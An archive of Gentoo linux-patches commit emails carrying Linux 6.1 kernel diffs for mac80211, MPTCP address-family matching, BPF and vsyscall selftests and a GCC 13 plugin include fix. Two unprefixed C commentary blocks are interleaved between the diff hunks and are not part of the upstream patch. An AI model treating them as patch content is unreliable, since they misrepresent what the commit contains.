+ 		struct sta_info *sta, *prev_sta;
+-		u8 link_id = status->link_id;
++		int link_id = -1;
+ 
+-		if (pubsta) {
+-			rx.sta = container_of(pubsta, struct sta_info, sta);
+-			rx.sdata = rx.sta->sdata;
++		if (status->link_valid)
++			link_id = status->link_id;
+ 
+-			if (status->link_valid &&
+-			    !ieee80211_rx_is_valid_sta_link_id(pubsta, link_id))
++		if (pubsta) {
++			if (!ieee80211_rx_data_set_sta(&rx, pubsta, link_id))
+ 				goto out;
+ 
+-			if (status->link_valid)
+-				rx.link_id = status->link_id;
+-
+ 			/*
+ 			 * In MLO connection, fetch the link_id using addr2
+ 			 * when the driver does not pass link_id in status.
+@@ -5066,7 +5045,7 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 				if (!link_sta)
+ 					goto out;
+ 
+-				rx.link_id = link_sta->link_id;
++				ieee80211_rx_data_set_link(&rx, link_sta->link_id);
+ 			}
+ 
+ 			if (ieee80211_prepare_and_rx_handle(&rx, skb, true))
+@@ -5082,30 +5061,27 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 				continue;
+ 			}
+ 
+-			if ((status->link_valid &&
+-			     !ieee80211_rx_is_valid_sta_link_id(&prev_sta->sta,
+-								link_id)) ||
+-			    (!status->link_valid && prev_sta->sta.mlo))
++			rx.sdata = prev_sta->sdata;
++			if (!ieee80211_rx_data_set_sta(&rx, &prev_sta->sta,
++						       link_id))
++				goto out;
++
++			if (!status->link_valid && prev_sta->sta.mlo)
+ 				continue;
+ 
+-			rx.link_id = status->link_valid ? link_id : -1;
+-			rx.sta = prev_sta;
+-			rx.sdata = prev_sta->sdata;
+ 			ieee80211_prepare_and_rx_handle(&rx, skb, false);
+ 
+ 			prev_sta = sta;
+ 		}
+ 
+ 		if (prev_sta) {
+-			if ((status->link_valid &&
+-			     !ieee80211_rx_is_valid_sta_link_id(&prev_sta->sta,
+-								link_id)) ||
+-			    (!status->link_valid && prev_sta->sta.mlo))
++			rx.sdata = prev_sta->sdata;
++			if (!ieee80211_rx_data_set_sta(&rx, &prev_sta->sta,
++						       link_id))
+ 				goto out;
+ 
+-			rx.link_id = status->link_valid ? link_id : -1;
+-			rx.sta = prev_sta;
+-			rx.sdata = prev_sta->sdata;
++			if (!status->link_valid && prev_sta->sta.mlo)
++				goto out;
+ 
+ 			if (ieee80211_prepare_and_rx_handle(&rx, skb, true))
+ 				return;
+diff --git a/net/mptcp/pm.c b/net/mptcp/pm.c
+index 45e2a48397b95..70f0ced3ca86e 100644
+--- a/net/mptcp/pm.c
++++ b/net/mptcp/pm.c
+@@ -420,6 +420,31 @@ void mptcp_pm_subflow_chk_stale(const struct mptcp_sock *msk, struct sock *ssk)
+ 	}
+ }
+ 
++/* if sk is ipv4 or ipv6_only allows only same-family local and remote addresses,
++ * otherwise allow any matching local/remote pair
++ */
++bool mptcp_pm_addr_families_match(const struct sock *sk,
++				  const struct mptcp_addr_info *loc,
++				  const struct mptcp_addr_info *rem)
++{
++	bool mptcp_is_v4 = sk->sk_family == AF_INET;
++
++#if IS_ENABLED(CONFIG_MPTCP_IPV6)
++	bool loc_is_v4 = loc->family == AF_INET || ipv6_addr_v4mapped(&loc->addr6);
++	bool rem_is_v4 = rem->family == AF_INET || ipv6_addr_v4mapped(&rem->addr6);
++
++	if (mptcp_is_v4)
++		return loc_is_v4 && rem_is_v4;
++
++	if (ipv6_only_sock(sk))
++		return !loc_is_v4 && !rem_is_v4;
++
++	return loc_is_v4 == rem_is_v4;
++#else
++	return mptcp_is_v4 && loc->family == AF_INET && rem->family == AF_INET;
++#endif
++}
++
+ void mptcp_pm_data_reset(struct mptcp_sock *msk)
+ {
+ 	u8 pm_type = mptcp_get_pm_type(sock_net((struct sock *)msk));
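/*
 * A standalone restatement of the rule added in
 * mptcp_pm_addr_families_match() above, with each address collapsed to an
 * "is v4" boolean the way the patch treats v4-mapped v6 addresses as v4.
 * Illustration only; families_match() is a hypothetical stand-in.
 */
#include <stdbool.h>
#include <stdio.h>

static bool families_match(bool sk_is_v4, bool sk_v6only,
			   bool loc_is_v4, bool rem_is_v4)
{
	if (sk_is_v4)
		return loc_is_v4 && rem_is_v4;
	if (sk_v6only)
		return !loc_is_v4 && !rem_is_v4;
	return loc_is_v4 == rem_is_v4; /* mixed local/remote pairs rejected */
}

int main(void)
{
	printf("%d\n", families_match(false, false, true, true)); /* 1 */
	printf("%d\n", families_match(true, false, true, false)); /* 0 */
	return 0;
}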
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index 0430415357ba3..c1d6cd5b188c2 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -294,6 +294,13 @@ int mptcp_nl_cmd_sf_create(struct sk_buff *skb, struct genl_info *info)
+ 	}
+ 
+ 	sk = &msk->sk.icsk_inet.sk;
++
++	if (!mptcp_pm_addr_families_match(sk, &addr_l, &addr_r)) {
++		GENL_SET_ERR_MSG(info, "families mismatch");
++		err = -EINVAL;
++		goto create_err;
++	}
++
+ 	lock_sock(sk);
+ 
+ 	err = __mptcp_subflow_connect(sk, &addr_l, &addr_r);
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index e97465f0c6672..29849d77e4bf8 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -107,7 +107,7 @@ static int __mptcp_socket_create(struct mptcp_sock *msk)
+ 	struct socket *ssock;
+ 	int err;
+ 
+-	err = mptcp_subflow_create_socket(sk, &ssock);
++	err = mptcp_subflow_create_socket(sk, sk->sk_family, &ssock);
+ 	if (err)
+ 		return err;
+ 
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index 62e9ff237b6e8..6f22ae13c9848 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -626,7 +626,8 @@ bool mptcp_addresses_equal(const struct mptcp_addr_info *a,
+ /* called with sk socket lock held */
+ int __mptcp_subflow_connect(struct sock *sk, const struct mptcp_addr_info *loc,
+ 			    const struct mptcp_addr_info *remote);
+-int mptcp_subflow_create_socket(struct sock *sk, struct socket **new_sock);
++int mptcp_subflow_create_socket(struct sock *sk, unsigned short family,
++				struct socket **new_sock);
+ void mptcp_info2sockaddr(const struct mptcp_addr_info *info,
+ 			 struct sockaddr_storage *addr,
+ 			 unsigned short family);
+@@ -761,6 +762,9 @@ int mptcp_pm_parse_addr(struct nlattr *attr, struct genl_info *info,
+ int mptcp_pm_parse_entry(struct nlattr *attr, struct genl_info *info,
+ 			 bool require_family,
+ 			 struct mptcp_pm_addr_entry *entry);
++bool mptcp_pm_addr_families_match(const struct sock *sk,
++				  const struct mptcp_addr_info *loc,
++				  const struct mptcp_addr_info *rem);
+ void mptcp_pm_subflow_chk_stale(const struct mptcp_sock *msk, struct sock *ssk);
+ void mptcp_pm_nl_subflow_chk_stale(const struct mptcp_sock *msk, struct sock *ssk);
+ void mptcp_pm_new_connection(struct mptcp_sock *msk, const struct sock *ssk, int server_side);
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 9d3701fdb2937..5220435d8e34d 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -1492,7 +1492,7 @@ int __mptcp_subflow_connect(struct sock *sk, const struct mptcp_addr_info *loc,
+ 	if (!mptcp_is_fully_established(sk))
+ 		goto err_out;
+ 
+-	err = mptcp_subflow_create_socket(sk, &sf);
++	err = mptcp_subflow_create_socket(sk, loc->family, &sf);
+ 	if (err)
+ 		goto err_out;
+ 
+@@ -1604,7 +1604,9 @@ static void mptcp_subflow_ops_undo_override(struct sock *ssk)
+ #endif
+ 		ssk->sk_prot = &tcp_prot;
+ }
+-int mptcp_subflow_create_socket(struct sock *sk, struct socket **new_sock)
++
++int mptcp_subflow_create_socket(struct sock *sk, unsigned short family,
++				struct socket **new_sock)
+ {
+ 	struct mptcp_subflow_context *subflow;
+ 	struct net *net = sock_net(sk);
+@@ -1617,8 +1619,7 @@ int mptcp_subflow_create_socket(struct sock *sk, struct socket **new_sock)
+ 	if (unlikely(!sk->sk_socket))
+ 		return -EINVAL;
+ 
+-	err = sock_create_kern(net, sk->sk_family, SOCK_STREAM, IPPROTO_TCP,
+-			       &sf);
++	err = sock_create_kern(net, family, SOCK_STREAM, IPPROTO_TCP, &sf);
+ 	if (err)
+ 		return err;
+ 
+diff --git a/tools/testing/memblock/.gitignore b/tools/testing/memblock/.gitignore
+index 654338e0be52e..4cc7cd5aac2b1 100644
+--- a/tools/testing/memblock/.gitignore
++++ b/tools/testing/memblock/.gitignore
+@@ -1,4 +1,5 @@
+ main
+ memblock.c
+ linux/memblock.h
++asm/asm.h
+ asm/cmpxchg.h
+diff --git a/tools/testing/memblock/Makefile b/tools/testing/memblock/Makefile
+index 246f7ac8489b4..575e98fddc21c 100644
+--- a/tools/testing/memblock/Makefile
++++ b/tools/testing/memblock/Makefile
+@@ -29,13 +29,14 @@ include: ../../../include/linux/memblock.h ../../include/linux/*.h \
+ 
+ 	@mkdir -p linux
+ 	test -L linux/memblock.h || ln -s ../../../../include/linux/memblock.h linux/memblock.h
++	test -L asm/asm.h || ln -s ../../../arch/x86/include/asm/asm.h asm/asm.h
+ 	test -L asm/cmpxchg.h || ln -s ../../../arch/x86/include/asm/cmpxchg.h asm/cmpxchg.h
+ 
+ memblock.c: $(EXTR_SRC)
+ 	test -L memblock.c || ln -s $(EXTR_SRC) memblock.c
+ 
+ clean:
+-	$(RM) $(TARGETS) $(OFILES) linux/memblock.h memblock.c asm/cmpxchg.h
++	$(RM) $(TARGETS) $(OFILES) linux/memblock.h memblock.c asm/asm.h asm/cmpxchg.h
+ 
+ help:
+ 	@echo  'Memblock simulator'
+diff --git a/tools/testing/selftests/bpf/prog_tests/jeq_infer_not_null.c b/tools/testing/selftests/bpf/prog_tests/jeq_infer_not_null.c
+new file mode 100644
+index 0000000000000..3add34df57678
+--- /dev/null
++++ b/tools/testing/selftests/bpf/prog_tests/jeq_infer_not_null.c
+@@ -0,0 +1,9 @@
++// SPDX-License-Identifier: GPL-2.0
++
++#include <test_progs.h>
++#include "jeq_infer_not_null_fail.skel.h"
++
++void test_jeq_infer_not_null(void)
++{
++	RUN_TESTS(jeq_infer_not_null_fail);
++}
+diff --git a/tools/testing/selftests/bpf/progs/jeq_infer_not_null_fail.c b/tools/testing/selftests/bpf/progs/jeq_infer_not_null_fail.c
+new file mode 100644
+index 0000000000000..f46965053acb2
+--- /dev/null
++++ b/tools/testing/selftests/bpf/progs/jeq_infer_not_null_fail.c
+@@ -0,0 +1,42 @@
++// SPDX-License-Identifier: GPL-2.0
++
++#include "vmlinux.h"
++#include <bpf/bpf_helpers.h>
++#include "bpf_misc.h"
++
++char _license[] SEC("license") = "GPL";
++
++struct {
++	__uint(type, BPF_MAP_TYPE_HASH);
++	__uint(max_entries, 1);
++	__type(key, u64);
++	__type(value, u64);
++} m_hash SEC(".maps");
++
++SEC("?raw_tp")
++__failure __msg("R8 invalid mem access 'map_value_or_null")
++int jeq_infer_not_null_ptr_to_btfid(void *ctx)
++{
++	struct bpf_map *map = (struct bpf_map *)&m_hash;
++	struct bpf_map *inner_map = map->inner_map_meta;
++	u64 key = 0, ret = 0, *val;
++
++	val = bpf_map_lookup_elem(map, &key);
++	/* Do not mark ptr as non-null if one of them is
++	 * PTR_TO_BTF_ID (R9), reject because of invalid
++	 * access to map value (R8).
++	 *
++	 * Here, we need to inline those insns to access
++	 * R8 directly, since compiler may use other reg
++	 * once it figures out val==inner_map.
++	 */
++	asm volatile("r8 = %[val];\n"
++		     "r9 = %[inner_map];\n"
++		     "if r8 != r9 goto +1;\n"
++		     "%[ret] = *(u64 *)(r8 +0);\n"
++		     : [ret] "+r"(ret)
++		     : [inner_map] "r"(inner_map), [val] "r"(val)
++		     : "r8", "r9");
++
++	return ret;
++}
+diff --git a/tools/testing/selftests/net/cmsg_sender.c b/tools/testing/selftests/net/cmsg_sender.c
+index 75dd83e39207b..24b21b15ed3fb 100644
+--- a/tools/testing/selftests/net/cmsg_sender.c
++++ b/tools/testing/selftests/net/cmsg_sender.c
+@@ -110,7 +110,7 @@ static void __attribute__((noreturn)) cs_usage(const char *bin)
+ 
+ static void cs_parse_args(int argc, char *argv[])
+ {
+-	char o;
++	int o;
+ 
+ 	while ((o = getopt(argc, argv, "46sS:p:m:M:d:tf:F:c:C:l:L:H:")) != -1) {
+ 		switch (o) {
+diff --git a/tools/testing/selftests/net/mptcp/userspace_pm.sh b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+index 3229725b64b0a..0040e3bc7b16e 100755
+--- a/tools/testing/selftests/net/mptcp/userspace_pm.sh
++++ b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+@@ -776,6 +776,52 @@ test_subflows()
+ 	rm -f "$evts"
+ }
+ 
++test_subflows_v4_v6_mix()
++{
++	# Attempt to add a listener at 10.0.2.1:<subflow-port>
++	ip netns exec "$ns1" ./pm_nl_ctl listen 10.0.2.1\
++	   $app6_port > /dev/null 2>&1 &
++	local listener_pid=$!
++
++	# ADD_ADDR4 from server to client machine reusing the subflow port on
++	# the established v6 connection
++	:>"$client_evts"
++	ip netns exec "$ns1" ./pm_nl_ctl ann 10.0.2.1 token "$server6_token" id\
++	   $server_addr_id dev ns1eth2 > /dev/null 2>&1
++	stdbuf -o0 -e0 printf "ADD_ADDR4 id:%d 10.0.2.1 (ns1) => ns2, reuse port\t\t" $server_addr_id
++	sleep 0.5
++	verify_announce_event "$client_evts" "$ANNOUNCED" "$client6_token" "10.0.2.1"\
++			      "$server_addr_id" "$app6_port"
++
++	# CREATE_SUBFLOW from client to server machine
++	:>"$client_evts"
++	ip netns exec "$ns2" ./pm_nl_ctl csf lip 10.0.2.2 lid 23 rip 10.0.2.1 rport\
++	   $app6_port token "$client6_token" > /dev/null 2>&1
++	sleep 0.5
++	verify_subflow_events "$client_evts" "$SUB_ESTABLISHED" "$client6_token"\
++			      "$AF_INET" "10.0.2.2" "10.0.2.1" "$app6_port" "23"\
++			      "$server_addr_id" "ns2" "ns1"
++
++	# Delete the listener from the server ns, if one was created
++	kill_wait $listener_pid
++
++	sport=$(sed --unbuffered -n 's/.*\(sport:\)\([[:digit:]]*\).*$/\2/p;q' "$client_evts")
++
++	# DESTROY_SUBFLOW from client to server machine
++	:>"$client_evts"
++	ip netns exec "$ns2" ./pm_nl_ctl dsf lip 10.0.2.2 lport "$sport" rip 10.0.2.1 rport\
++	   $app6_port token "$client6_token" > /dev/null 2>&1
++	sleep 0.5
++	verify_subflow_events "$client_evts" "$SUB_CLOSED" "$client6_token" \
++			      "$AF_INET" "10.0.2.2" "10.0.2.1" "$app6_port" "23"\
++			      "$server_addr_id" "ns2" "ns1"
++
++	# RM_ADDR from server to client machine
++	ip netns exec "$ns1" ./pm_nl_ctl rem id $server_addr_id token\
++	   "$server6_token" > /dev/null 2>&1
++	sleep 0.5
++}
++
+ test_prio()
+ {
+ 	local count
+@@ -812,6 +858,7 @@ make_connection "v6"
+ test_announce
+ test_remove
+ test_subflows
++test_subflows_v4_v6_mix
+ test_prio
+ 
+ exit 0
+diff --git a/tools/testing/selftests/proc/proc-empty-vm.c b/tools/testing/selftests/proc/proc-empty-vm.c
+index d95b1cb43d9d0..7588428b8fcd7 100644
+--- a/tools/testing/selftests/proc/proc-empty-vm.c
++++ b/tools/testing/selftests/proc/proc-empty-vm.c
+@@ -25,6 +25,7 @@
+ #undef NDEBUG
+ #include <assert.h>
+ #include <errno.h>
++#include <stdint.h>
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <string.h>
+@@ -41,7 +42,7 @@
+  * 1: vsyscall VMA is --xp		vsyscall=xonly
+  * 2: vsyscall VMA is r-xp		vsyscall=emulate
+  */
+-static int g_vsyscall;
++static volatile int g_vsyscall;
+ static const char *g_proc_pid_maps_vsyscall;
+ static const char *g_proc_pid_smaps_vsyscall;
+ 
+@@ -147,11 +148,12 @@ static void vsyscall(void)
+ 
+ 		g_vsyscall = 0;
+ 		/* gettimeofday(NULL, NULL); */
++		uint64_t rax = 0xffffffffff600000;
+ 		asm volatile (
+-			"call %P0"
+-			:
+-			: "i" (0xffffffffff600000), "D" (NULL), "S" (NULL)
+-			: "rax", "rcx", "r11"
++			"call *%[rax]"
++			: [rax] "+a" (rax)
++			: "D" (NULL), "S" (NULL)
++			: "rcx", "r11"
+ 		);
+ 
+ 		g_vsyscall = 1;
+diff --git a/tools/testing/selftests/proc/proc-pid-vm.c b/tools/testing/selftests/proc/proc-pid-vm.c
+index 69551bfa215c4..cacbd2a4aec91 100644
+--- a/tools/testing/selftests/proc/proc-pid-vm.c
++++ b/tools/testing/selftests/proc/proc-pid-vm.c
+@@ -257,11 +257,12 @@ static void vsyscall(void)
+ 
+ 		g_vsyscall = 0;
+ 		/* gettimeofday(NULL, NULL); */
++		uint64_t rax = 0xffffffffff600000;
+ 		asm volatile (
+-			"call %P0"
+-			:
+-			: "i" (0xffffffffff600000), "D" (NULL), "S" (NULL)
+-			: "rax", "rcx", "r11"
++			"call *%[rax]"
++			: [rax] "+a" (rax)
++			: "D" (NULL), "S" (NULL)
++			: "rcx", "r11"
+ 		);
+ 
+ 		g_vsyscall = 1;
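/*
 * Both selftest hunks above swap a direct call through an "i" (immediate)
 * asm operand for an indirect call through a register: "+a" pins the
 * vsyscall address in rax as an input/output, so rax also drops out of the
 * clobber list. Presumably this keeps the test building where a rel32
 * direct call cannot reach the fixed address (e.g. position-independent
 * executables). The plain-C shape of such an indirect call is a function
 * pointer cast (illustration only; calling it faults unless the legacy
 * vsyscall page is mapped, e.g. vsyscall=emulate):
 */
#include <stddef.h>
#include <sys/time.h>

int main(void)
{
	int (*vgettimeofday)(struct timeval *, struct timezone *) =
		(int (*)(struct timeval *, struct timezone *))0xffffffffff600000UL;

	return vgettimeofday(NULL, NULL);
}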
+diff --git a/tools/virtio/vringh_test.c b/tools/virtio/vringh_test.c
+index fa87b58bd5fa5..98ff808d6f0c2 100644
+--- a/tools/virtio/vringh_test.c
++++ b/tools/virtio/vringh_test.c
+@@ -308,6 +308,7 @@ static int parallel_test(u64 features,
+ 
+ 		gvdev.vdev.features = features;
+ 		INIT_LIST_HEAD(&gvdev.vdev.vqs);
++		spin_lock_init(&gvdev.vdev.vqs_list_lock);
+ 		gvdev.to_host_fd = to_host[1];
+ 		gvdev.notifies = 0;
+ 
+@@ -455,6 +456,7 @@ int main(int argc, char *argv[])
+ 	getrange = getrange_iov;
+ 	vdev.features = 0;
+ 	INIT_LIST_HEAD(&vdev.vqs);
++	spin_lock_init(&vdev.vqs_list_lock);
+ 
+ 	while (argv[1]) {
+ 		if (strcmp(argv[1], "--indirect") == 0)


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-01-22 14:59 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-01-22 14:59 UTC (permalink / raw
  To: gentoo-commits

commit:     f659ca60651a53d186ce854c3eefa8ad024cd0ba
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Jan 22 14:59:31 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Jan 22 14:59:31 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=f659ca60

gcc-plugins: Reorganize gimple includes for GCC 13

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |  4 +++
 ..._gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch | 41 ++++++++++++++++++++++
 2 files changed, 45 insertions(+)

diff --git a/0000_README b/0000_README
index eb8a606b..b3e83a42 100644
--- a/0000_README
+++ b/0000_README
@@ -103,6 +103,10 @@ Patch:  2920_sign-file-patch-for-libressl.patch
 From:   https://bugs.gentoo.org/717166
 Desc:   sign-file: full functionality with modern LibreSSL
 
+Patch:	2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
+From:   https://lore.kernel.org/lkml/mhng-8bc81919-3023-4d72-bd44-2443606b4fd7@palmer-ri-x1c9a/T/
+Desc:   gcc-plugins: Reorganize gimple includes for GCC 13
+
 Patch:  3000_Support-printing-firmware-info.patch
 From:   https://bugs.gentoo.org/732852
 Desc:   Print firmware info (Reqs CONFIG_GENTOO_PRINT_FIRMWARE_INFO). Thanks to Georgy Yakovlev

diff --git a/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch b/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
new file mode 100644
index 00000000..0b454ec8
--- /dev/null
+++ b/2930_gcc-plugins-Reorg-gimple-incs-for-gcc-13.patch
@@ -0,0 +1,41 @@
+gcc-plugins: Reorganize gimple includes for GCC 13
+
+The gimple-iterator.h header must be included before gimple-fold.h
+starting with GCC 13. Reorganize gimple headers to work for all GCC
+versions.
+
+Reported-by: Palmer Dabbelt <palmer@rivosinc.com>
+Link: https://lore.kernel.org/all/20230113173033.4380-1-palmer@rivosinc.com/
+Cc: linux-hardening@vger.kernel.org
+Signed-off-by: Kees Cook <keescook@chromium.org>
+---
+ scripts/gcc-plugins/gcc-common.h | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/scripts/gcc-plugins/gcc-common.h b/scripts/gcc-plugins/gcc-common.h
+index 9a1895747b15..84c730da36dd 100644
+--- a/scripts/gcc-plugins/gcc-common.h
++++ b/scripts/gcc-plugins/gcc-common.h
+@@ -71,7 +71,9 @@
+ #include "varasm.h"
+ #include "stor-layout.h"
+ #include "internal-fn.h"
++#include "gimple.h"
+ #include "gimple-expr.h"
++#include "gimple-iterator.h"
+ #include "gimple-fold.h"
+ #include "context.h"
+ #include "tree-ssa-alias.h"
+@@ -85,10 +87,8 @@
+ #include "tree-eh.h"
+ #include "stmt.h"
+ #include "gimplify.h"
+-#include "gimple.h"
+ #include "tree-phinodes.h"
+ #include "tree-cfg.h"
+-#include "gimple-iterator.h"
+ #include "gimple-ssa.h"
+ #include "ssa-iterators.h"
+ 
+-- 
+2.34.1


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-01-18 11:29 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-01-18 11:29 UTC (permalink / raw
  To: gentoo-commits

commit:     3a4f90d35a846c31efef8d7280e2ca565d778f07
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jan 18 11:29:44 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jan 18 11:29:44 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=3a4f90d3

Linux patch 6.1.7

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |     4 +
 1006_linux-6.1.7.patch | 10521 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 10525 insertions(+)

diff --git a/0000_README b/0000_README
index 9e9a8d04..eb8a606b 100644
--- a/0000_README
+++ b/0000_README
@@ -67,6 +67,10 @@ Patch:  1005_linux-6.1.6.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.6
 
+Patch:  1006_linux-6.1.7.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.7
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1006_linux-6.1.7.patch b/1006_linux-6.1.7.patch
new file mode 100644
index 00000000..9c382dc8
--- /dev/null
+++ b/1006_linux-6.1.7.patch
@@ -0,0 +1,10521 @@
+diff --git a/Documentation/devicetree/bindings/display/msm/dsi-controller-main.yaml b/Documentation/devicetree/bindings/display/msm/dsi-controller-main.yaml
+index 3b609c19e0bc4..6c5b4783812ae 100644
+--- a/Documentation/devicetree/bindings/display/msm/dsi-controller-main.yaml
++++ b/Documentation/devicetree/bindings/display/msm/dsi-controller-main.yaml
+@@ -32,7 +32,7 @@ properties:
+       - description: Display byte clock
+       - description: Display byte interface clock
+       - description: Display pixel clock
+-      - description: Display escape clock
++      - description: Display core clock
+       - description: Display AHB clock
+       - description: Display AXI clock
+ 
+@@ -134,8 +134,6 @@ required:
+   - phy-names
+   - assigned-clocks
+   - assigned-clock-parents
+-  - power-domains
+-  - operating-points-v2
+   - ports
+ 
+ additionalProperties: false
+diff --git a/Documentation/devicetree/bindings/display/msm/dsi-phy-10nm.yaml b/Documentation/devicetree/bindings/display/msm/dsi-phy-10nm.yaml
+index d9ad8b659f58e..3ec466c3ab38b 100644
+--- a/Documentation/devicetree/bindings/display/msm/dsi-phy-10nm.yaml
++++ b/Documentation/devicetree/bindings/display/msm/dsi-phy-10nm.yaml
+@@ -69,7 +69,6 @@ required:
+   - compatible
+   - reg
+   - reg-names
+-  - vdds-supply
+ 
+ unevaluatedProperties: false
+ 
+diff --git a/Documentation/devicetree/bindings/display/msm/dsi-phy-14nm.yaml b/Documentation/devicetree/bindings/display/msm/dsi-phy-14nm.yaml
+index 1342d74ecfe0f..0a7b5f110d885 100644
+--- a/Documentation/devicetree/bindings/display/msm/dsi-phy-14nm.yaml
++++ b/Documentation/devicetree/bindings/display/msm/dsi-phy-14nm.yaml
+@@ -38,7 +38,6 @@ required:
+   - compatible
+   - reg
+   - reg-names
+-  - vcca-supply
+ 
+ unevaluatedProperties: false
+ 
+diff --git a/Documentation/devicetree/bindings/display/msm/dsi-phy-28nm.yaml b/Documentation/devicetree/bindings/display/msm/dsi-phy-28nm.yaml
+index 3d8540a06fe22..2f1fd140c87df 100644
+--- a/Documentation/devicetree/bindings/display/msm/dsi-phy-28nm.yaml
++++ b/Documentation/devicetree/bindings/display/msm/dsi-phy-28nm.yaml
+@@ -34,6 +34,10 @@ properties:
+   vddio-supply:
+     description: Phandle to vdd-io regulator device node.
+ 
++  qcom,dsi-phy-regulator-ldo-mode:
++    type: boolean
++    description: Indicates if the LDO mode PHY regulator is wanted.
++
+ required:
+   - compatible
+   - reg
+diff --git a/Documentation/gpu/todo.rst b/Documentation/gpu/todo.rst
+index 393d218e4a0cf..b2c6aaf1edf27 100644
+--- a/Documentation/gpu/todo.rst
++++ b/Documentation/gpu/todo.rst
+@@ -651,17 +651,6 @@ See drivers/gpu/drm/amd/display/TODO for tasks.
+ 
+ Contact: Harry Wentland, Alex Deucher
+ 
+-vmwgfx: Replace hashtable with Linux' implementation
+-----------------------------------------------------
+-
+-The vmwgfx driver uses its own hashtable implementation. Replace the
+-code with Linux' implementation and update the callers. It's mostly a
+-refactoring task, but the interfaces are different.
+-
+-Contact: Zack Rusin, Thomas Zimmermann <tzimmermann@suse.de>
+-
+-Level: Intermediate
+-
+ Bootsplash
+ ==========
+ 
+diff --git a/Documentation/sphinx/load_config.py b/Documentation/sphinx/load_config.py
+index eeb394b39e2cc..8b416bfd75ac1 100644
+--- a/Documentation/sphinx/load_config.py
++++ b/Documentation/sphinx/load_config.py
+@@ -3,7 +3,7 @@
+ 
+ import os
+ import sys
+-from sphinx.util.pycompat import execfile_
++from sphinx.util.osutil import fs_encoding
+ 
+ # ------------------------------------------------------------------------------
+ def loadConfig(namespace):
+@@ -48,7 +48,9 @@ def loadConfig(namespace):
+             sys.stdout.write("load additional sphinx-config: %s\n" % config_file)
+             config = namespace.copy()
+             config['__file__'] = config_file
+-            execfile_(config_file, config)
++            with open(config_file, 'rb') as f:
++                code = compile(f.read(), fs_encoding, 'exec')
++                exec(code, config)
+             del config['__file__']
+             namespace.update(config)
+         else:
+diff --git a/Documentation/virt/kvm/api.rst b/Documentation/virt/kvm/api.rst
+index 896914e3a8475..b8ec88ef2efa2 100644
+--- a/Documentation/virt/kvm/api.rst
++++ b/Documentation/virt/kvm/api.rst
+@@ -8248,6 +8248,20 @@ CPU[EAX=1]:ECX[24] (TSC_DEADLINE) is not reported by ``KVM_GET_SUPPORTED_CPUID``
+ It can be enabled if ``KVM_CAP_TSC_DEADLINE_TIMER`` is present and the kernel
+ has enabled in-kernel emulation of the local APIC.
+ 
++CPU topology
++~~~~~~~~~~~~
++
++Several CPUID values include topology information for the host CPU:
++0x0b and 0x1f for Intel systems, 0x8000001e for AMD systems.  Different
++versions of KVM return different values for this information and userspace
++should not rely on it.  Currently they return all zeroes.
++
++If userspace wishes to set up a guest topology, it should be careful that
++the values of these three leaves differ for each CPU.  In particular,
++the APIC ID is found in EDX for all subleaves of 0x0b and 0x1f, and in EAX
++for 0x8000001e; the latter also encodes the core id and node id in bits
++7:0 of EBX and ECX respectively.
++
+ Obsolete ioctls and capabilities
+ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+ 
+diff --git a/Makefile b/Makefile
+index 19e8c6dec6e54..7eb6793ecfbfd 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 6
++SUBLEVEL = 7
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm64/include/asm/atomic_ll_sc.h b/arch/arm64/include/asm/atomic_ll_sc.h
+index 0890e4f568fb7..cbb3d961123b1 100644
+--- a/arch/arm64/include/asm/atomic_ll_sc.h
++++ b/arch/arm64/include/asm/atomic_ll_sc.h
+@@ -315,7 +315,7 @@ __ll_sc__cmpxchg_double##name(unsigned long old1,			\
+ 	"	cbnz	%w0, 1b\n"					\
+ 	"	" #mb "\n"						\
+ 	"2:"								\
+-	: "=&r" (tmp), "=&r" (ret), "+Q" (*(unsigned long *)ptr)	\
